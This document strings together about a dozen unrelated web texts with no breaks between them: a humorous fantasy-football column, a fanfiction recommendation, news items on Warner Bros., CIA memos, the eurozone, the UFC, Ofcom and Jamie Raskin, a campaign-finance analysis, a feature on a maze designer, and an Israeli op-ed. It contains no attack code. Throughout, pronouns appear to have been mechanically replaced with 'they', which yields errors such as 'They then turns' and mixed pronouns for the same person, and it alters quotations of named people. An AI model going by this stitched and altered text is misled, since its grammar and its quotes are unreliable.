[Following in the tradition of Brendan's Rooky Errors or Leigh's Month as an Assassin , it's time for another article on an unusual corner of gaming. This time, the ancient tradition of Fantasy Football.]
Gav: It's 6:45 on a Friday night, I've just got off a flight from Cologne to London and I'm attempting to tether the internet from my phone to my really old, really rubbish and currently really unresponsive laptop. This would be annoying enough if I wasn't also attempting to manoeuvre through some horrendous London traffic in a beaten-up old jallopy. I know even using your phone (no less a phone AND a laptop) whilst driving is reckless and stupid but there's an excuse for my idiocy: it's the evening of my NFL Fantasy Draft.
Before I lose you, let me just say I know how you're feeling, but stick with me as I explain why game fans will find a fantasy football league interesting.
I've been playing in a fantasy NFL league with the same 9 people for coming up to 5 years now and it's only recently that it's struck me how so much of the things that get me jazzed about it have in common with the things I love about games: a tight community, horrible back-stabbing, friendship-ending competitiveness, heartache-inducing waves of bad luck and a stressful meta game which I've genuinely lost sleep over.
If you don't know how a fantasy football league works, here's the basics in 90 words: People who play fantasy football are basically general managers/coaches of virtual football dream teams made up of real-life players whose real-life stats on actual fields earn points for the virtual teams.
It's pretty popular in the UK with the English Premier League (roundball) but it's actually a billion dollar industry in the US with their longer, egg-shaped balls. There are countless TV shows and websites dedicated to fantasy NFL and fantasy stats are even shown in stadiums during NFL games so people can play along whilst watching live football. That happens, I've done it.
The thing I love about NFL fantasy football more than the UK version though is that a football player can only belong to one manager's team. So, that league favourite, Johnny Big Arm, who's really good at lobbing the football down the field and scoring loads of points? They can only be part of one person's team. How do you decide who gets Johnny Big Arm? With a fantasy league draft.
The draft is a live online event that leagues organise themselves before the season starts. It's a way of divvying up the real-life players to the fantasy managers. Managers take it in turns to select a player until their roster slots (usually 16) are full. Obviously big players like Johnny Big Arm and Andy Catch-em-All will go first so planning which players you'll pick at what stage in the draft can be agonising depending on where you are in the draft order. If you're not picking until last in the first round then there's a good chance you're going to miss out on Johnny and Andy so you have to plan accordingly – maybe you can take old Vincey Bouncy Shoes instead?
There's so much second guessing the other managers involved that trying to predict who will take who and when becomes a whole game in itself, as does attempt to influence the decisions of others via private messages and condescending Facebook posts. I'm not too bad at it but if you remember back to where we started – me tooling down the motorway screaming at my laptop – being behind the wheel of a car whilst trying to draft adds a whole other level of stress because this is what a draft looks like:
There's so much to keep an eye on: where you are in the picking order? Which players have already gone? Do you have your next pick lined up? If someone takes him, who are you going for?
When it's your turn you only have 120 seconds to make your decision. So, that dude – Si-Si The Running Guy? The one you were going to pin all your hopes for this season on? Yeah, they just got picked up by your mate so now you have to rethink your whole strategy. And to top it all off, you have a chat window in the bottom full of nonsense from the other managers trying to influence your decisions. I like to think I give as good as I get here but there are some members of the league I annoyingly let get into my head and plant their slimy seeds of filthy doubt in my brain.
The draft situation would be stressful enough sitting in a comfy chair whilst enjoying a lovely cup of tea and some hobnobs but take this situation and whack it into a Ford KA that's doing 80 on a motorway and the situation becomes ever so slightly more tense.
Why didn't I just reschedule the draft? If I knew I was flying home on that particular evening, why not just postpone the whole thing? We make the rules of our own league, surely it wouldn't be a problem? Except of course it is, because we're idiots who MAKE THE RULES OF OUR OWN LEAGUE.
The amount of silly rules and regulations we've come up with over five seasons is ridiculous but the one I currently hate is that after a draft date has been decided no player is allowed to change the date for any reason including illness, sadness or because they forgot they'd be flying into London Gatwick from Germany 20 minutes before the draft's scheduled start time. Failure to comply with this rule results in expulsion from the league and that cannot happen because I need this league of jerks in my idiot life. So, it's because of this stupid rule that I find myself hurtling down the M23 to my house in South London whilst screaming as I see that Si-Si The Running Guy has indeed gone to my league arch-nemesis. I might as well have banked the car there and then and started my new life underneath the dual-carriageway in Nutfied.
I managed to get home in one piece and finish the draft with some redemption in the form of beating several of the league's “problem players” (see: players who routinely give me a thumping every season) to their 5th,6th and 7th picks resulting in some of the tastiest online chat I've seen since the days of mIRC. It was a glorious finish for my draft with the exception of one position: the tight end.
Timmy the Awesome Tight End is a good player because not only can they catch the ball, he's also big enough to block the opposite side from moving down the pitch. I'd been left with Tony the Somewhat Serviceable Tight End who would've done OK for me had they not gone and injured themselves before the season had even started; leaving me with a 6ft 5”, 250lb gap in my team. So what happens when Tony fractures their stupid hand (or worse still, if Si-Si The Running Guy gets knocked over the head) and gets ruled out of the rest of the season? Well, then you go to the Waiver Wire, which is essentially a bucket for all the sad football men that didn't get picked to be on anyone's team. I kinda think of it as the waiting room in Beetlejuice but with more people named Deshawn.
You're free to swap your main roster of players with the ones in the waiver bucket as much as you want; again there's an order to pick that's automatically decided every week, but understanding that apparently doesn't matter if you take my league's Weekly Whatsapp Waiver Meltdown™ as evidence.
This year I managed to pick up a tight end named Gary Barnidge from the Bucket of Sadness. I thought “Well, he'll do until Tony the Serviceable Tight End recovers from their idiot-related injury,” but then something happened. During the third game, Gary, who hadn't scored a touchdown in 17 NFL games, only went and tumbled one in! Everyone sort of celebrated in the same way as when you hear someone's passed their driving test on the 9th go; it's not an incredible feat of human endeavour, it doesn't affect you in any way but you're happy for them.
Well done, Gary. Here they are on a camel:
Gary and I were regularly smashing up the rest of the league, even ending another manager's unbeaten start to the season – the second best record ever held in our league. Gary and I were unstoppable. So much so that whilst out late one night, I was offered a trade for my precious Gary from another manager. A straight-up one-for-one trade which would've seen me take one of the league's top players.
Trades are a weird beast in NFL fantasy. In a previous season, I stupidly traded away one of my (and the league's) the best players for three absolute dirt players to someone who had correctly seen that I had two players in the same position injured that week and that I'd been at my work's Christmas party the night before and could barely stand the next day, let alone read the conditions of a fantasy trade. They took to private messaging me about the trade, something that happens quite a lot.
“How're you feeling buddy? Anything I can do?” “Rough, I can't even type, I'm doing this all through Siri” “Just sent you a little trade that'll cheer you up. Think you'll like it. Should sort out all your injury worries” “Oh, cheers mate. I needed that”
By the time I realised what I'd done, it was too late. I'd traded my best player away. The manager in question went on to win the league that year and the rest of the managers rightfully despised me. This memory lingered as my finger hovered over the ‘Confirm Trade' button in our Fantasy app but I just couldn't do that to Gary, not after all we'd been through. I rejected the trade and though I probably would've fared much better that season had I jettisoned Gary, I felt better having them in my side and will stand by that decision until they or I die.
The thing that keeps me coming back to playing fantasy football every week during the NFL season is the same reason I sometimes despise it: luck. You can have the best players in the league but even they're going to have a bad game from time to time or Johnny Big Arm might snap their back and you'll be without their lush arms for the rest of the season. Each week you decide which 9 players you'll field out of your roster, another painstaking job that involves a disgusting amount of research and an even more annoying degree of second-guessing. Your 9 players then go head-to-head with another manager's side and the person who scores the most points gets the win.
The one-on-one element is something I absolutely love. There's a tense adrenaline rush involved when it's just you against another person that I think's hard to replicate in team-based games. The added element of luck also makes it slightly more enjoyable as you can always blame a loss on a poor-performing star player rather than be personally blamed for a loss entirely. That makes it more fun than if you lose a game due to being a bit rubbish.
I've been an NFL fan for almost ten years but watching games when you have something at stake completely changes the dynamic. I've rooted for teams I cannot stand and have no business supporting just because I happen to have their kicker in my lineup. I've actually done worse, and secretly hoped players of mine have missed tackles, slipped over or caught food poisoning from a particularly naughty hot dog before a big game just to get the upper hand over a manager. I've lay in bed staring at the ESPN Fantasy app until the early hours of the morning willing games to end while my opponent runs out a win in spectacular fashion to the point where I've had to start leaving my phone in a different room when I go to sleep on Sunday and Monday nights.
If all this sounds ridiculous to you, clearly it's because I haven't told you what's at stake: A 2ft tall lump of wood with a spray painted football man on top. To you, it might look like something made by an inmate on Death Row, but to me it's The Bannister.
The winner of our league gets to hold this in their possession for a whole year and it's awarded to them at a private dinner party held in the home-town of the previous year's winner on the evening before the Super Bowl. This year I came the closest I've ever come to winning it (which is to say, not very close at all) but at this year's prestigious dinner event I was awarded “Most Improved Player”. It didn't matter that this was a framed photo with ‘Most Improved Playa 2K15' written on it in sharpie. It genuinely did bring a tear to my eye.
Winning that bit of wood and watching other awards (such as ‘The Golden Chicken') being handed to my fellow coaches made all those horrendously bleary Monday and Tuesday mornings worth it, not to mention almost killing myself on the M23.
The plan to bring The Bannister home to South London next season has officially begun.
By day, Gav Murphy is a producer and presenter for IGN. By night they take on the form of one quarter of The Regular Features podcast. For still more hot Gav action, check out our Let's Play of Funemployed.
[Rating T13][Friendship][Romance][Fluff][Complete]
For fans of Kittah4's highly entertaining Partners saga, here's a treat for you! This is a stellar revamp/remix of one of the earlier parts of this popular series that delves more into Nick and Judy's romantic relationship, expands on certain events, and delights us with a spectacular amount of fluff. The writing is excellent, the interactions are heartfelt, and the romance is sweet. And if you haven't read Partners yet, this will certainly prompt you to go check it out. -DrummerMax64
Author: Kittah4
Description :
Nick Wilde has been partners with Judy Hopps for just two years. The two have settled into a comfortable routine in their lives. Both are considered some of the Zootopia Police Department's finest; the two have pretty much everything they could ever want. And yet…
Partners: Revisited
Also on Fanfiction.net
Additional Tags: Let's do that again, shall we?
A source close to Warner Bros. who was not authorized to speak publicly said… (Wilson Webb / Warner Bros. )
Among the many challenges facing Warner Bros. in the aftermath of Friday's deadly shooting at a Colorado screening of "The Dark Knight Rises" is what to do about a key scene -- involving a bloodbath at a movie theater -- in its next big film, "Gangster Squad."
The noir film starring Sean Penn, Emma Stone, Josh Brolin and Ryan Gosling centers on the Los Angeles Police Department's secret 1940s anti-mob gangster squad.
One of the film's signature scenes is set at Grauman's Chinese Theater in Hollywood, when mobsters go backstage and open fire through the screen at the audience. Automatic gunfire rips through the screen as horrified filmgoers rush for the exits and the cops try to stop the mayhem. (You can glimpse the scene in the trailer above, starting at the 2:03 mark).
PHOTOS: Scene of the shooting | Hollywood reacts
The movie is set for release Sept. 7, and trailers for the film including snippets of the scene have already been playing.
Story highlights Russian meddling in the 2016 election has been front and center for the duration of President Donald Trump's seven months in office
The memos were obtained by BuzzFeed News through Freedom of Information Act lawsuit against the Agency
Washington (CNN) Then-CIA Director John Brennan wrote to employees that they believed not all members of Congress understood the significance of the agency's determination that Russia interfered in the 2016 presidential election, according to an internal CIA memo published Thursday by BuzzFeed.
"In recent days, I have had several conversations with members of Congress, providing an update on the status of the review as well as the considerations that need to be taken into account as we proceed," the December 16 Brennan memo published by BuzzFeed reads. "Many -- but unfortunately not all -- members understand and appreciate the importance and gravity of the issue, and they are very supportive of the process that is underway."
In another Brennan memo dated December 13, they address "a variety of reports and commentary about purported CIA intelligence and assessments on foreign activities related" to the election.
In that memo, they cautioned their staff that "there will likely be additional uninformed public discourse and speculation on this matter that will surface in the media in the days and weeks ahead."
"I understand how frustrating such reports can be, but this is one of the many challenges we face in our line of work," the memo published by BuzzFeed reads.
A long-term solution to the crises rippling through the 17-nation eurozone will require the creation of a central finance ministry with the power to exercise controls over national budgets, Jean-Claude Trichet, president of the European Central Bank, said on Thursday.
Speaking in Aachen in Germany, Trichet urged closer European integration as the means of imposing discipline on countries which failed to keep their public finances in order, monitor economic reform and provide a common approach to dealing with Europe's financial sector.
The ECB president said their plan would fall short of giving a pan-European finance ministry tax-raising powers, but suggested that the idea was a logical next step.
"In this union of tomorrow, or of the day after tomorrow, would it be too bold, in the economic field, with a single market and a single central bank, to envisage a ministry of finance of the union?" they said as they accepted the Charlemagne prize for contributions to European unity.
Trichet's intervention came on the eve of Friday's announcement of the terms Greece will have to accept for a second bailout from the EU and IMF.
Trichet acknowledged that a central ministry would be a radical step for the European Union and require a revision of its underlying treaty. While supporters of closer integration believe there is currently little political appetite in member states for a fresh transfer of powers to the centre, they argue that the only alternative to closer fiscal union will be the break-up of the single currency.
"Looking at the euro area today, we see clearly that countries that abide by the rules of the single currency can thrive and prosper," Trichet said. "But we also see the opposite. Strengthening the rules to prevent unsound policies is therefore an urgent priority."
Trichet said international bailouts of countries in exchange for their pledges to reform their finances – the model which has been followed for Greece, Ireland and Portugal – were reasonable as an initial response to debt crises.
"But if a country is still not delivering, I think all would agree that the second stage has to be different," they said, suggesting that eurozone authorities be given "a much deeper and authoritative say in the formation of the country's economic policies if these go harmfully astray".
They added: "It would be not only possible, but in some cases compulsory, in the second stage for the European authorities – namely the council on the basis of a proposal by the commission, in liaison with the ECB – to take themselves decisions applicable in the economy concerned."
On May 13, I wrote up an analysis of campaign finance data that asked “Did almost 600 donors break campaign finance law in 2012?” Truth is, I wasn't sure. The bulk data made it appear that way, but as I noted at the outset, “our most troubling finding may be just how difficult it is determined with legal certainty exactly how many campaign scofflaws there are, or how much over the limit they gave.”
In the past week, I have received one e-mail and one letter proving that point. Both came from some rather prominent individuals.
First the e-mail, which was sent on behalf of Charles G. Koch: “The analysis asserts that Charles Koch exceeded the 2011-2012 biennial overall contribution limits and the PAC and party contribution limits,” wrote Missy Cohlmia, Director, Corporate Communication, Koch Companies Public Sector, LLC. “We have checked our records at length and request that Sunlight Foundation take Mr. Koch off this list.”
It turned out they were right. A correction has been made.
But the reasons why they were right are worth examining in some detail. They provide some compelling examples of the limits of our campaign finance disclosure system. And they raise questions about whether the federal contribution limits have any meaning at all.
The name match problem
To calculate how many donors appeared to have given more than the $117,000 legal limit in individual contributions to candidates, parties, and campaigns in the 2012 cycle, I wrote some code to go through all the bulk campaign finance records that we receive from the Center for Responsive Politics (CRP). I summed totals by a unique ID that CRP adds to the raw Federal Election Commission (FEC) data for each contributor.
CRP, a respected nonpartisan nonprofit, creates these unique IDs because the FEC, which regulates campaign finance in the United States, does not. Not only does the FEC not assign a publicly-available unique ID to each campaign donor, the regulatory agency does not appear to have an internal unique ID or any way to reliably assign contributions to the individuals who gave them.
The case at hand illustrates why creating such unique identifiers is important. Contributor names show up in several permutations in FEC raw data. For example, Charles G. Koch is alternately listed in the filings made by candidates and other political committees as “Charles Koch,” “Mr. Charles Koch,” “Charles G. Koch,” and “Mr. Charles G. Koch.”
Because donors – and the recipients of their funds – aren't required to accurately and reliably identify themselves in FEC records, it's left to CRP to take on the daunting task. In the 2012 election, there were about 1.26 million unique donors, many with multiple name permutations. That's a lot of name matching. Turns out that in this case CRP gave Charles Chase Koch the same unique ID as Charles G. Koch (probably because they have the same first and last name, and both live in Wichita, Kansas). Charles Chase Koch, vice president of Koch Fertilizer, is the son of Charles G. Koch.
Campaign finance records show that Charles Chase Koch made two $2,500 contributions to Richard E. Mourdock, the losing Republican Senate candidate in Indiana, in the 2012 cycle.
When I asked Ms. Cohlmia to confirm that Charles Chase Koch (and not Charles G. Koch) had in fact made these two contributions, they responded that one of the two $2,500 contributions did indeed come from Charles G. Koch, “but the Murdock campaign erroneously counted this as Charles Chase Koch's contribution.” Hence, another problem: mis-reporting by a campaign.
Limits? What limits??
Our campaign finance records showed that Charles G. Koch also gave $81,600 to parties and committees in the 2012 cycle – $61,600 to the Republican National Committee, $10,000 to the Republican Senatorial Committee, and $10,000 to the Koch Industries Political Action Committee. The legal limit for individual aggregate contributions to parties and committees per cycle is $70,800.
This would, at first glance, appear to be in violation. There is, however, a loophole. Checks to recount funds do not count towards the aggregate limits. As I wrote in the original post:
Certain donations, such as those to recount campaigns, don't count against the legal aggregate limit and, as they are reported in the same format as other contributions, are difficult to sort out. To assess whether or not the money went to recounts requires a line-by-line reading of actual contribution filings, since this is not translated into the electronic data.
That was a short-hand way of explaining things. The longer explanation is this: A variable in the FEC bulk data allows us to know whether the contribution was made in the primary or general election, or whether it falls into an ill-defined category of “other.” The category “other” can include recount funds. It also includes a motley mix of other contribution types, some of which should count towards the aggregate limits. Without the endless hours of labor it would take to hand-verify each of these “other” records, we can't be sure which contributions should actually count.
It turns out that one of Charles G. Koch's RNC contributions was, in fact, a recount contribution. I quote here from Missy Cohlmia's e-mail to me:
Also, with respect to the PAC and party contributions, we can confirm all the ones listed, and again, the $30,800 contribution to the RNC made on 10/3/2011, should not be counted toward the aggregate PAC and party contribution limits because they are for the recount fund. See page 6 of 24 of FEC Advisory Opinion 2006-24, in which the FEC states that “the aggregate biennial contribution limits of 2 U.S.C. 441(a)(a)(3) do not apply to an individual's donations to recount funds.”
Interesting date on that contribution: October 3, 2011. That is a month and a year before Election Day 2012 – in other words, well before any recounts were underway.
We also received a similar complaint from Robert K. Kelner, lawyer for Kenneth and Anne Griffin. Kenneth Griffin, CEO of Citadel Investment, gave $122,000 in hard money, all to Republicans candidates ($31,200) and Republican committees ($90,800). Anne Griffin, a portfolio manager at Aragon Global Management, gave $141,300, also all to Republican candidates ($40,700) and committees ($100,600). But again, both took advantage of the recount loophole. As their lawyer advised us in a letter, our totals were based on us “erroneously including the $30,800 contributions that they each made to the Republican National Committee's recount fund on September 7, 2011.”
This continues to make us wonder: As a matter of policy, why are recount funds not counted against federal campaign contributions limits? As I wrote in the original post:
Whether or not contributions went to recount funds or general election funds strikes us as an arbitrary distinction. If the limits are designed to limit corruption or the appearance of corruption, it is unclear to us why recount funds would be different from general election funds. Is someone who writes a check to help with a recount battle not buying ingratiation?
Koch complications, pt. 3
But even that was not the complete story for Charles G. Koch. Cohlmia told me that there was another party contribution that did not show up in our campaign finance data: a $20,000 donation to the NRCC (National Republican Congressional Committee). If we included that contribution (but not the $30,800 recount contribution), Charles G. Koch's countable contributions to party and PAC committees for the 2012 cycle would be at $70,800 – exactly the legal limit. (Why this contribution did not show up in our data is unclear, though there are any number of plausible explanations, including more mis-reporting by a committee.)
So, add back in the $35,000 in candidate contributions, and Charles G. Koch gave $105,800 in the 2011-2012 cycle, within the legal aggregate individual. So instead of being a six-figure individual donor who went just over the legal limit, it turns out they were a six-figure individual donor who came in just a little under the legal limit.
The Koch contributions we tallied above, of course, include just the money we know about. Possibly, they gave much more money to the Koch-funded 501(c)(4) Americans for Prosperity, which spent at least $33.5 million in the 2012 election against Barack Obama. Since 501(c)(4) organizations do not have to reveal their donors, we will never know. But since money given to politically active nonprofits doesn't count against the FEC limits, whatever dollars Charles G. Koch might have sent in that direction wouldn't impact the legal status of their individual aggregate contributions.
Likewise with the Griffins: Kenneth Griffin gave $1,000,000 to American Crossroads, and $1,550,000 million to Restore Our Future. We don't know if they also gave money to a 501(c)(4). Anne Griffin also gave $30,000 to the super PAC “Campaign for Primary Accountability.”
The takeaway
The case of Charles G. Koch is a nice lesson in just how hard it is to determine who is breaking and who is abiding by campaign finance limits. It's hard to make accurate tallies of individual aggregate campaign contributions when the Federal Elections Commission doesn't require donors to have a unique ID, and when campaigns don't always reliably report donor names. Given this, it is unclear how the FEC would even enforce its own aggregate limit rules. The FEC's spokesperson told me that while the FEC welcomes complaints, it does not typically take enforcement initiative.
It's also challenging because recount funds are exempted from aggregate individual donation limits, but the FEC doesn't provide data in a form that makes it easy to separate out those contributions from ones that do count. The only way to effectively enforce the law is to spend endless hours hand-verifying individual FEC records. It's almost as if the system were designed to make enforcement impossible.
Just because the byzantine structure of campaign finance data seems designed to obfuscate and thereby stymie enforcement doesn't mean we shouldn't give it our best shot. Aggregate limit rules exist for a reason: Because we've collectively decided we don't want a particular group of individual donors who could afford to give $117,000 in 2011-2012 (more than twice the median annual family income in this country) disproportionate influence in determining who can and who cannot get elected in this country. We ought to know whether or not they are being enforced.
The UFC is planning an event on the same night as the highly-anticipated Canelo Álvarez vs. Gennady Golovkin boxing match.
The Fight Night card, scheduled for Sept. 16, is slated for Pittsburgh, Pa. Two fights that have been recently added to it are Thiago Alves vs. Mike Perry and Hector Lombard vs. Anthony Smith.
MMAFighting.com first reported the Alves-Perry fight was scheduled for Aug. 19, however, the UFC recently canceled that card and moved the fight to Sept. 16.
MMAJunkie.com also reported last month that Lombard-Smith was originally set for the same card in August. The promotion canceled that event due to its proximity to the Floyd Mayweather vs. Conor McGregor boxing match on Aug. 26.
Álvarez-GGG, one of the biggest boxing matches in recent memory, will take place at the T-Mobile Arena in Las Vegas.
It's unclear at this time who will headline the Pittsburgh event for the UFC.
Image copyright Channel 4 News Image caption Fatima Manji co-presented the news bulletin from the London studio the day after the attack
Ofcom has rejected complaints that it was inappropriate for a Muslim TV reporter wearing a hijab to cover the Nice terrorist attack in July.
The media watchdog said there were no grounds to investigate after receiving 17 complaints about the attire of Channel 4 News presenter Fatima Manji.
"The way in which the presenter chose to dress in this case did not raise any issues under our rules," Ofcom said.
The watchdog will not be "taking the matter forward for investigation".
'Religious discrimination'
The Ofcom spokesperson also said that "the selection of a presenter is an editorial matter for the broadcaster".
Manji co-presented the Channel 4 News bulletin, produced by ITN, from London during coverage of the lorry attack in Nice which killed 86 people on 15 July.
So-called Islamic State subsequently claimed responsibility for the attack.
Image copyright Getty Images Image caption Kelvin MacKenzie questioned whether it was appropriate for a Muslim presenter to report on the attack
Sun columnist Kelvin MacKenzie questioned whether the Muslim presenter should have appeared on the bulletin.
The Independent Press Standards Organisation (Ipso) has received some 1,700 complaints over their remarks, including one from Manji themselves and one from Channel 4 news.
The programme's editor, Ben de Pear, said last month that the correspondent had been a victim of "religious discrimination".
"ITN believes the article was in breach of a number of provisions of the Editor's Code, in particular discrimination, harassment by intimidation and inaccuracy," they added.
De Pear said a "further complaint" had been made by ITN chief executive John Hardie "which fully supports and endorses the grounds and reasoning of Fatima's complaint".
A ruling from Ipso is not expected until the autumn.
Follow us on Twitter @BBCNewsEnts, on Instagram, or if you have a story suggestion email entertainment.news@bbc.co.uk.
UPDATE: May 4 -- After nontheist organizations rallied around him, Maryland state Sen. Jamie Raskin (D) distanced themselves from the "atheism" label in an interview with The Washington Post. Raskin said he's Jewish and a humanist "with a small 'h.'" “I've never called myself an atheist,” they said. “I've never pronounced upon the existence of a divinity before, and nobody has ever asked me.” Raskin did not explicitly tell the Post that they believed in a supernatural deity. Read more here. PREVIOUSLY:
WASHINGTON -- Maryland state Sen. Jamie Raskin (D) made headlines Tuesday by defeating a primary opponent who poured $12.7 million of their own money into the race -- a record-setting amount for a self-funded U.S. House campaign. They could garner national attention again if they win the general election -- a likely possibility in Maryland's heavily blue 8th Congressional District.
With a victory in November, Raskin would become the only openly atheist member of Congress.
Raskin does not hide their humanist beliefs, a philosophy that eschews supernatural faith and holds that it's possible to lead an ethical life without fearing God.  They are a member of the nonprofit American Humanist Association, which lobbies Congress on the separation of church and state, and was supported by the group's Freethought Equality Fund political action committee. (He also teaches constitutional law.)
Raskin is perhaps best known in nontheist circles for testimony they gave in 2006 in favor of marriage equality in Maryland, when they reminded a state senator that lawmakers "place their hand on the Bible and swear to uphold the Constitution. They don't put their hand on the Constitution and swear to uphold the Bible.”
That retort, which they tout on their campaign website, briefly made Raskin a secular progressive folk hero. Now the nontheist community may celebrate them again.
“If successful in the general election, Raskin will be the only open nontheist serving in the U.S. Congress, the first ever to win an open seat, and just the second humanist to serve in Congress," said Roy Speckhardt, executive director of the Freethought Equality Fund, in a statement. "Raskin's election is a significant event for the secular community and will help to dispel the baseless bias against this rapidly growing segment of America.”
Then-Rep. Pete Stark (D-Calif.) acknowledged they were an atheist in 2007, but they had already served in Congress for over 30 years. Stark left the House in 2012 when they lost to a primary challenger.
The current Congress may be the most diverse ever, with increasing numbers of women and people of color serving as a better reflection of the overall makeup of the U.S. But when it comes to religion, the beliefs of lawmakers remain woefully unrepresentative of the nation as a whole. Nearly one-quarter of Americans now place themselves in the broad category of religious "nones" -- those who are religiously unaffiliated or simply don't believe in God. But there are currently no open atheists in Congress, and only one member — Rep. Kyrsten Sinema (D-Ariz.) — who lists themselves as unaffiliated.
All of this speaks to the continued distrust of atheists in America. A recent Pew survey found that atheism was the most significant political liability among a range of possible traits. More than 50 percent of respondents said they'd be less likely to vote for a presidential candidate who didn't believe in God.
Public antipathy may be keeping other elected nonbelievers in the closet. Former Rep. Barney Frank (D-Mass.) didn't publicly admit they were an atheist until after they retired from Congress, more than 25 years after they came out as the first openly gay member of congress. In 2014, Maggie Ardiente, communications director of the American Humanist Association, claimed there were 24 members of Congress who had privately admitted to the group that they didn't believe in God.
While Raskin hasn't hidden their humanist views, they haven't been especially outspoken about them during their congressional campaign. It's not clear exactly how, or if, they would guide their work on Capitol Hill. Their campaign did not immediately respond to a request for comment.
Bishop McNeill, PAC manager for the Freethought Equality Fund, said they were confident that Raskin would continue to embody the progressive humanist philosophy that has already contributed to their appeal, whether the voters recognized it as such or not.
"I think one of the core principles of humanism is to use reason and compassion to make decisions in your everyday life, and for a politician, that means when you are debating public policy issues and casting votes," they told HuffPost in a statement.
In the 36 years that Adrian Fisher has been in business, they have created every kind of maze imaginable – from simple, head-high fields of maize to bewildering, hi-tech caverns with flashing lights and revolving mirrors. They've been based on everything from chess to Alice in Wonderland, from alien planets to the ancient pyramids of Egypt. In all, Fisher has built some 700 different mazes all over the world.
Maze-making requires a particularly peculiar kind of design. At its heart, after all, it means designing something confounding and discombobulating, rather than smooth and foolproof. How does Fisher do it? How did they get into this highly particular field? And why do they – and do we – find mazes so entrancing?
A puzzling purpose
Mazes date back to the ancient times, although the earliest form of maze – the labyrinth – had an important difference from most of those found today. Made famous by the tale of the Minotaur and the Minoan palace in Crete, a labyrinth has only one path leading to the centre. Its purpose wasn't to confuse. It was to lead a walker along a meandering path that encouraged contemplation and serenity.
Although their purpose remains mysterious, labyrinths probably had a spiritual dimension. Later, with the rise of the Church, some scholars think labyrinths became associated with the idea of walking the difficult path of a Christian.
The oldest maze in Great Britain, the trapezoidal hedge maze at Hampton Court, was commissioned in 1700
By the Renaissance, nobles were building labyrinths at their palace gardens out of hedges – a way to amuse their visitors and to provide a particular path through their estate. And then mazes began to branch off with various pathway options and dead ends, designed to deliberately confound. Given its landscape tradition, it's no surprise that England became the home to many of those puzzles. The longest surviving in Great Britain, the trapezoidal hedge maze at Hampton Court, was commissioned in 1700; visitors can still get lost in it today.
Britain's most famous and prolific maze designer, Fisher carries on that tradition from their base in rural Dorset, where, of course, they have built their own maze – complete with an octagonal tower.
Surprisingly, Fisher doesn't typically spend months coming up with ideas: their mirror maze at Arizona's Butterfly Wonderland attraction took them only a week to design. Like mazemakers of centuries past, however, Fisher often starts with a hand-drawn sketch. “Somehow, it is more vivid, more dramatic than a computer simulation – which can re-create the motion, but not so much the feel and the excitement,” they say. They then turns to computer software to prepare drawings and three-dimensional models.
While technology has made maze-making easier, it has made expectations much higher, too. Maze owners now want an installation that looks good not just from the ground, but from the air – whether it's in the shape of a skull and crossbones or the head of a wild animal. The latest addition to Fisher's kitbag? A miniature drone that they can fly overhead to show the client what the maze looks like from the sky.
Royal beginnings
Fisher's maze-making career was auspicious from the start. When the Right Reverend Robert Runcie, the Archbishop of Canterbury, spoke at their enthronement ceremony in 1980, saying the path to heaven is like a circuitous maze, the speech struck a chord with the then-30-year-old Fisher. They wrote a letter to The Times reflecting on the magical and mystical appeal of labyrinths throughout history.
We all love being a bit lost. A maze should be a joyful thing
In response, a former lady-in-waiting to the Queen Mother, Lady Brunner, invited Fisher to come speak with them about mazes – and about one they wanted to build at their home at Greys Court, near Henley-on-Thames, in particular. “I had never received any formal training in maze-making, but I had a huge number of thoughts and ideas on the subject,” Fisher says. “She must have seen something in me that inspired them to employ me.” The Archbishop themselves came to bless the maze when it opened the next year.
“We all love being a bit lost,” Adrian says. “A maze, to my mind, should be a joyful thing. Ideally, you need to get properly lost, but find your way out at the point just before you've had enough – during the period in which fun and disorientation are still operating hand in hand.”
The disorientating, cognitively challenging experience of navigating a maze is one that has inspired scientists, particularly social scientists, for decades. In 1937, celebrated American psychologist Edward Chace Tolman said in a speech that “everything important in psychology” could be investigated by analysing how rats behave in mazes. This wasn't a new idea; at the turn of the previous century, the first animal maze study had been developed at Clark University, with a maze based on the pattern of the Hampton Court maze, to study association and home-finding behaviours.
Everything important in psychology can be investigated with mazes – Edward Chace Tolman, 1937
While mazes are still used in experiments today, they've gotten far less complicated – not so much designed to trick a rodent as to time how long it takes it to complete a simple task if, say, it's on a particular drug being tested.
At the same time, mazes for humans have only gotten more complex and fanciful, thanks to designers like Fisher.
Witness the installation in the grounds of an estate owned by an Italian count near Verona. Not only has Fisher built a mysterious tower in the middle of a hedge maze, but once there, visitors descend a spiral staircase into an underground chamber – where the count's much-prized fossil collection is stored. At the end? The only way out is via a mirror maze built into the side of a cliff.
It does us all good, from time to time, to find ourselves being challenged. To discover that we don't know the answer
At the very least, Fisher plans their mazes to always have more than one configuration. On different days, staff shut some gates and open others – as return visitors discover at a variety of Fisher mazes in the UK, including Merseyside's Speke Hall and Aigburth, Hampshire's Staunton Country Park, and Devon's Escot Park. “That way, someone who's already visited the maze will find they no longer know the solution to the puzzle when they come back,” Fisher says.
Fisher is even brainstorming features whereby choice of direction is allocated at random – as in a maze that visitors have to navigate by moving vehicle. “Let's say there's four of you in a boat, and each of you has a steering wheel,” they say. “Imagine what happens when the power switches between different wheels. One minute, you think you're in control; the next minute, it's someone else. Then, of course, you can throw in different tasks that have to be completed. Perhaps you have to visit four towers in the course of your journey, or answer 12 quiz questions at 12 different points.”
No matter what the particular configuration, what's important is that the maze, at least for a time, confuses us.
“It does us all good, from time to time, to find ourselves being challenged. To discover that we don't know the answer,” Fisher says. “When you step inside a maze, it has an effect on you that cannot be measured in a conventional way. It simply cannot be expressed in sentences, in numbers or in digits. It is, I really do believe, a sort of magic.”
Follow BBC Future on Facebook, Twitter, Google+ and LinkedIn. This story is a part of BBC Britain – a new series focused on exploring this extraordinary island, one story at a time. Readers outside of the UK can see every BBC Britain story by heading to the Britain homepage; you also can see our latest stories by following us on Facebook and Twitter.
Last Saturday we marked a painful milestone, the five-year anniversary of Gilad Shalit's abduction. The Shalit campaign was joined by former security officials who endorse paying the “current price” demanded by Hamas. These ex-officials also handed out “tranquilizers,” saying that the IDF will be able to cope with freed terrorists. As these are former officials, they will not be bearing the responsibility, and their emotions overcome their long-term thinking.
Other Side MKs to declare support for Shalit deal? Moran Azulay Captive soldier's family aims to collect MKs' signatures in favor of prisoner exchange; bereaved parents negate any deal that will see terrorists freed MKs to declare support for Shalit deal?
But was Hamas softened by this display? Did it promote Gilad Shalit's release? Isn't it clear to all those “men of letters” that capitulation and the release of hundreds of terrorists will exact a bloody price, as happened in the past?
